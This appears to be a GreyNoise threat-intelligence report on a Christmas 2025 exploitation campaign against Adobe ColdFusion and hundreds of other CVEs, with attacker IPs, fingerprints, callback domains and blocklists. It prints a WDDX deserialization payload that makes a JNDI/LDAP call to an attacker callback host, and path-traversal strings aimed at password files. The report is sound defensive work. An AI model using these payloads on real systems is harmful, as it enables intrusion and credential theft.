UPDATE: Further analysis revealed the ColdFusion campaign represents a small fraction of a much larger operation. The two primary IPs (134.122.136.119, 134.122.136.96) generated over 2.5 million requests targeting 767 distinct CVEs across 47+ technology stacks, using nearly 10,000 unique Interactsh OAST domains. This appears to be a broad, well-coordinated initial access broker campaign. Details in the Expanded Campaign Scope section below.
GreyNoise observed a coordinated exploitation campaign targeting Adobe ColdFusion servers over the Christmas 2025 holiday period. The attack appears to be a single threat actor operating from Japan-based infrastructure (CTG Server Limited). This source was responsible for ~98% of attack traffic, systematically exploiting 10+ ColdFusion CVEs from 2023-2024.
The campaign leveraged ProjectDiscovery Interactsh for out-of-band callback verification, with JNDI/LDAP injection as the primary attack vector. The deliberate timing during Christmas Day (68% of traffic) suggests intentional targeting during reduced security monitoring periods.
Compiled IoC data files can be found at https://github.com/GreyNoise-Intelligence/gn-research-supplemental-data/tree/main/2025-12-26-coldfusion.
| Metric | Value |
|---|---|
| Total Requests | 5,940 |
| Unique Source IPs | 8 |
| Unique Callback Domains | 190 |
| CVEs Targeted | 10+ |
| Countries Targeted | 20 |
| Peak Activity | December 25, 2025 |
| Dest. Country | # Sessions |
|---|---|
| United States | 4,044 |
| Spain | 753 |
| India | 128 |
| Canada | 100 |
| Chile | 100 |
| Germany | 100 |
| Pakistan | 100 |
| Cambodia | 51 |
| Ecuador | 50 |
| France | 50 |
| Japan | 50 |
| Panama | 50 |
| Poland | 50 |
| South Africa | 50 |
| Ghana | 48 |
| Kenya | 48 |
| Peru | 48 |
| Sweden | 47 |
| United Kingdom | 44 |
| New Zealand | 29 |
The dominant threat actor operates from two IPs on CTG Server Limited, a Japan-based hosting provider.
| IP Address | Requests | Percentage | ASN |
|---|---|---|---|
| 134.122.136.119 | 3,188 | 53.7% | AS152194 |
| 134.122.136.96 | 2,683 | 45.2% | AS152194 |
Behavioral Indicators: - Automated scanning with 1-5 second request intervals - Both IPs operated concurrently 41% of the time (coordinated infrastructure) - Cycled through 11 distinct attack types per target - Shared Interactsh session (subdomain prefixes d56*/d57*)
| IP Address | Organization | Country | Requests | Notes |
|---|---|---|---|---|
| 23.234.85.20 | tzulo, inc. | Canada | 34 | Double-encapsulated traffic (VPN) |
| 38.225.206.87 | Kennies Star India | India | 12 | Paired with .88, identical patterns |
| 38.225.206.88 | Kennies Star India | India | 11 | Paired with .87, identical patterns |
| 172.81.132.99 | DataWagon LLC | United States | 7 | — |
| 172.68.119.26 | Cloudflare, Inc. | Japan | 3 | CF-proxied traffic |
| 162.159.110.4 | Cloudflare, Inc. | Japan | 2 | CF-proxied traffic |
CTG Server Limited is a Hong Kong-registered hosting provider operating AS152194. The network controls approximately 201,000 IPv4 addresses across 672 prefixes despite being only about one year old.
Relevant OSINT findings:
The combination of Hong Kong jurisdiction, rapid IP space acquisition, and documented abuse associations suggests this provider operates with limited abuse enforcement.
The campaign exploited the full spectrum of 2023-2024 ColdFusion vulnerabilities:
| CVE | Type | Requests |
|---|---|---|
| Generic RCE | Remote Code Execution | 1,403 |
| Generic LFI | Local File Inclusion | 904 |
| CVE-2023-26359 | Deserialization RCE | 833 |
| CVE-2023-38205 | Access Control Bypass | 654 |
| CVE-2023-44353 | Remote Code Execution | 611 |
| CVE-2023-38203 | Remote Code Execution | 346 |
| CVE-2023-38204 | Remote Code Execution | 346 |
| CVE-2023-29298 | Access Control Bypass | 342 |
| CVE-2023-29300 | Remote Code Execution | 176 |
| CVE-2023-26347 | Access Control Bypass | 171 |
| CVE-2024-20767 | Arbitrary File Read | 146 |
| CVE-2023-44352 | Reflected XSS | 8 |
| Payload Type | Count | Percentage | Purpose |
|---|---|---|---|
| JNDI/LDAP Injection | 189 | 80% | CVE-2023-26359 exploitation |
| WDDX Deserialization | 28 | 12% | JdbcRowSetImpl gadget chain |
| Path Traversal/LFI | 10 | 4% | Credential harvesting |
| JSP Code Injection | 6 | 3% | CVE-2018-15961 verification |
| Command Injection | 1 | <1% | Direct RCE |
The primary attack vector uses WDDX deserialization to trigger JNDI lookups:
<wddxPacket version='1.0'>
<header/>
<data>
<struct type='com.sun.rowset.JdbcRowSetImpl'>
<var name='dataSourceName'>
<string>ldap://[callback_domain]/[path]</string>
</var>
<var name='autoCommit'>
<boolean value='true'/>
</var>
</struct>
</data>
</wddxPacket>Gadget Chain: com.sun.rowset.JdbcRowSetImpl (JNDI injection via dataSourceName)
../../../../../../../../../../../etc/passwd
i/../lib/password.propertiesThe threat actor uses ProjectDiscovery Interactsh for out-of-band verification of successful exploitation.
Services Used:
| Service | Callbacks | Percentage |
|---|---|---|
| oast.pro | 42 | 22% |
| oast.site | 38 | 20% |
| oast.me | 34 | 18% |
| oast.online | 27 | 14% |
| oast.fun | 25 | 13% |
| oast.live | 24 | 13% |
All callback subdomains follow the Interactsh format: 33-character alphanumeric string
Actor Correlation via Prefix:
| Prefix | Actor | Infrastructure |
|---|---|---|
d56* / d57* |
CTG Server Limited | Primary (186 callbacks) |
d4t* |
tzulo, inc. | Secondary (2 callbacks) |
d4r* |
Cloudflare-proxied | Secondary (2 callbacks) |
LDAP Paths Observed: - /rcrzfd — 97 occurrences - /zdfzfd — 92 occurrences
These paths likely differentiate payload variants or target tracking.
| JA4T Fingerprint | Count | Interpretation |
|---|---|---|
64240_2-4-8-1-3_1460_7 |
5,784 | Linux, standard MTU |
64240_2-4-8-1-3_1360_7 |
50 | Linux, VPN/tunnel |
64620_2-4-8-1-3_1436_7 |
44 | Linux, PPPoE |
64740_2-4-8-1-3_1245_7 |
34 | Linux, double-encapsulated |
65495_2-4-8-1-3_65495_7 |
23 | Linux, loopback (proxy) |
65535_2-4-8-1-3_1460_13 |
5 | Windows |
| JA4H Fingerprint | Count | Method | Headers |
|---|---|---|---|
po11nn060000_4ea4093e6290_000000000000_000000000000 |
3,382 | POST | 6 |
ge11nn040000_532a1ee47909_000000000000_000000000000 |
1,295 | GET | 4 |
ge11nn06en00_0e5d97bc8ad6_000000000000_000000000000 |
1,257 | GET | 6 |
The ColdFusion activity described above represents approximately 0.2% of the total scanning operation from these two IPs. Analysis of the full dataset reveals a comprehensive vulnerability reconnaissance campaign.
| Metric | ColdFusion Campaign | Full Campaign |
|---|---|---|
| Total Requests | 5,940 | 2,540,552 |
| CVEs Targeted | 10+ | 767 |
| Attack Signatures | 12 | 1,288 |
| JA4H Fingerprints | 5 | 4,118 |
| OAST Domains | 190 | ~10,000 |
The 767 targeted CVEs span from 2001 to 2025:
| Year | Unique CVEs | Requests |
|---|---|---|
| 2024 | 142 | 33,744 |
| 2023 | 107 | 29,762 |
| 2022 | 112 | 49,148 |
| 2021 | 99 | 46,385 |
| 2020 | 43 | 24,552 |
| 2019 | 41 | 29,551 |
| 2018 | 58 | 53,623 |
| 2017 | 19 | 25,987 |
| 2010-2016 | 80 | 109,169 |
| Pre-2010 | 13 | 17,114 |
| 2025 | 51 | 11,468 |
| CVE | Requests |
|---|---|
| CVE-2022-26134 (Confluence OGNL) | 12,481 |
| CVE-2014-6271 (Shellshock) | 8,527 |
| CVE-2016-6195 (vBulletin SQLi) | 5,604 |
| CVE-2002-1131 (SquirrelMail XSS) | 5,536 |
| CVE-2013-2251 (Struts 2 RCE) | 5,510 |
| CVE-2013-2134 (Struts 2 OGNL) | 5,284 |
| CVE-2010-2035 (Joomla LFI) | 5,148 |
| CVE-2017-10271 (WebLogic) | 4,836 |
| CVE-2022-47945 (ThinkPHP LFI) | 4,784 |
| CVE-2018-11776 (Struts 2 RCE) | 4,298 |
The campaign targeted 47+ distinct technology stacks:
| Category | Technologies | Requests |
|---|---|---|
| Java Application Servers | Tomcat, WebLogic, JBoss, GlassFish | 132,113 |
| Web Frameworks | Apache, Struts, Spring, ThinkPHP | 91,253 |
| CMS Platforms | WordPress, Joomla, Drupal, vBulletin | 72,711 |
| Atlassian Products | Confluence, Bitbucket | 19,494 |
| Network Devices | D-Link, Cisco, Netgear, TP-Link, Zyxel, F5 | 36,355 |
| Surveillance Systems | Dahua, Hikvision | 7,636 |
| Monitoring Tools | Nagios, Zabbix, Grafana, Kibana | 11,507 |
| Enterprise Applications | SAP, Zoho, ColdFusion, Oracle | 35,613 |
| Category | Unique Tags | Requests | Percentage |
|---|---|---|---|
| Reconnaissance | 53 | 1,431,870 | 56.4% |
| CVE Exploits | 776 | 434,984 | 17.1% |
| LFI/Path Traversal | 38 | 236,718 | 9.3% |
| RCE/Command Injection | 190 | 100,552 | 4.0% |
| OAST Callbacks | 1 | 95,402 | 3.8% |
| Authentication Attacks | 61 | 88,345 | 3.5% |
| SQL Injection | 47 | 19,929 | 0.8% |
| File Upload | 21 | 13,293 | 0.5% |
| SSRF | 17 | 9,270 | 0.4% |
The 4,118 unique JA4H fingerprints and ~10,000 OAST domains suggest:
Ian Campbell/DomainTools has provided DNS-based IOC data for recent OAST domains:
# Primary Threat Actor (CTG Server Limited) - BLOCK IMMEDIATELY
134.122.136.119
134.122.136.96
# Secondary Actors
23.234.85.20
38.225.206.87
38.225.206.88
172.81.132.99
# Cloudflare-Proxied (may be legitimate traffic behind CF)
172.68.119.26
162.159.110.4AS152194 # CTG Server Limited - Primary actor
AS11878 # tzulo, inc.
AS150654 # Kennies Star India
AS27176 # DataWagon LLC*.oast.pro
*.oast.site
*.oast.me
*.oast.online
*.oast.fun
*.oast.live# JA4T (TCP)
64240_2-4-8-1-3_1460_7
64240_2-4-8-1-3_1360_7
64620_2-4-8-1-3_1436_7
64740_2-4-8-1-3_1245_7
# JA4H (HTTP)
po11nn060000_4ea4093e6290_000000000000_000000000000
ge11nn040000_532a1ee47909_000000000000_000000000000
ge11nn06en00_0e5d97bc8ad6_000000000000_000000000000d4rrp47fn3bphsg36ktgrnxs88i793xh8.oast.fun
d4rrp47fn3bphsg36ktgwmhg6gs184cgp.oast.fun
d4ttv6m52uktrcfij1mg4z1sxco79xbrx.oast.site
d4ttv6m52uktrcfij1mgretwywufsexrr.oast.site
d560h4t0mm9g3ve8u8007go4bggx4mfip.oast.pro
d560h4t0mm9g3ve8u800f5ujdfhi58ty7.oast.pro
d565pronu06u9lln5rug1mt8wad5fbgrk.oast.pro
d565pronu06u9lln5rugt8mt8gngf4m1m.oast.pro
d56bg80or2rkvmbdrmq04dqz3ahrwu8ft.oast.fun
d56bg80or2rkvmbdrmq0gszxyj9npxnx5.oast.fun| Date | Hour Range (UTC) | Requests | Primary Actor |
|---|---|---|---|
| Dec 23 | 07:00-15:00 | 37 | Mixed |
| Dec 24 | 08:00-21:00 | 25 | Mixed |
| Dec 25 | 04:00-23:00 | 4,014 | CTG Server Limited |
| Dec 26 | 00:00-10:00 | 1,864 | CTG Server Limited |
Peak Hour: December 25, 15:00 UTC (317 requests)